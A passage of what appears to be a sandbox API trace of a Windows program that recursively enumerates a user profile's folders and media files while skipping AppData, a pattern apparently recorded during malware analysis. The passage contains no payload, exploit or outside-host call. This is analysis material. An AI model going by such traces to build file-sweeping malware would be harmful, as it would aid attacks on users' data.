wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.911] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 1 [0157.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.911] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x1540056, ftCreationTime.dwLowDateTime=0x4ab1, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1560057, nFileSizeHigh=0x4ab1, nFileSizeLow=0x9baa08, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="V0\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.911] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1160067, ftCreationTime.dwLowDateTime=0x4afd, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1280068, nFileSizeHigh=0x4afd, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="v6\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.912] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 1 [0157.912] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 1 [0157.913] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10c0078, ftCreationTime.dwLowDateTime=0x4b2f, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x10e0079, nFileSizeHigh=0x4b2f, nFileSizeLow=0x9ba678, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="xh\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.913] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.913] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0157.913] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Documents", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0157.913] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba6c0, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x866028c, nFileSizeHigh=0x4667, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.914] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="NetHood", cAlternateFileName="")) returned 1 [0157.914] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NetHood", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0157.914] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba708, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x866028c, nFileSizeHigh=0x4691, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.914] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd65eda30, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xd65eda30, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd65c78d0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0157.915] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Pictures", cAlternateFileName="")) returned 1 [0157.916] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.916] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0157.916] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.916] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.916] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 1 [0157.916] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.919] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ggHHL.png", cAlternateFileName="")) returned 1 [0157.919] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="GX6xg0MP-Oop8LYh", cAlternateFileName="GX6XG0~1")) returned 1 [0157.919] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0157.919] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.922] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.922] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="E hluVFFklat", cAlternateFileName="EHLUVF~1")) returned 1 [0157.922] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.925] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.925] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 1 [0157.925] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 1 [0157.926] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: 